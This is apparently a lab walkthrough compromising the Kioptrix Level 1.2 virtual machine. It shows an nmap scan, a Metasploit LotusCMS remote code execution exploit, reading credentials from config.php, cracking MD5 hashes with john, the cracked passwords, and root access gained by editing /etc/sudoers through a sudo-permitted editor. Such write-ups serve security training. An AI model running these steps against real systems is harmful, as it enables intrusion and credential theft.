Start scanning the machine using nmap commands:
nmap -sC -sV -oA nmap/Level1.2 192.168.43.176
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 09:21 EDT
Nmap scan report for 192.168.43.176
Host is up (0.0046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:72:68:BE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
Then, I saw port 80 is open, let's put the IP to the browser and see what we got.
Got this output and galleryand phpmyadmincaught my eye!
First we navigate to the phpmyadmin and got a login form.
I manage to use the username administrator to login but nothing seems to be interesting pops up.
I navigate back to the login form and see what can I do from here.
Tried SQL injection but had no luck, but I saw the login form is powered by LotusCMS, decided to use searchsploitto see what exploit we can find.
Found it ! Next, we can use msfconsoleto let us run the exploit.
type use exploit/multi/http/lcms_php_exec, then type show options
then set RHOST 192.168.43.176 to remote host IP
set URI to /
type runor exploit
Then type shell to get a shell from the meterpreter.
Then, we will get a proper shell by typing /bin/bash -i
Then, we need to locate a file called config.php
After cat the file and we got a lot of code, I manage to saw the login credentials for the myphpadmin login form.
After that, navigate to the gallery database and go to the dev_account table and we will find two users username and password in hash.
put it inside a text file and we type john --wordlists=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hash.txt
Then we will get the password for both users
dreg:mast3r
loneferret:starwars
Privilege Escalation
Then, we login to both users with ssh, I can't find anything interesting in dreg user, so maybe loneferret is the one that we want to access.
After logged into the account, then we cat the CompanyPolicy.README file and got this
When we type sudo ht, we got this
Then I type which ht and ls -l /usr/local/bin/ht and we know it is owned by root and it can be exploit by SUID rights.
Then we can type export TERM=xterm to get a graphical interface
then sudo ht and press F3 and navigate to /etc/sudoers
change to the loneferret ALL=NOPASSWD: ALL
Then, press F2 to save and F10 to quit
Type sudo su and you will get root
Or you can put /bin/bash at the end of the line
Then type sudo /bin/bash and you will get root!
Congratulation!
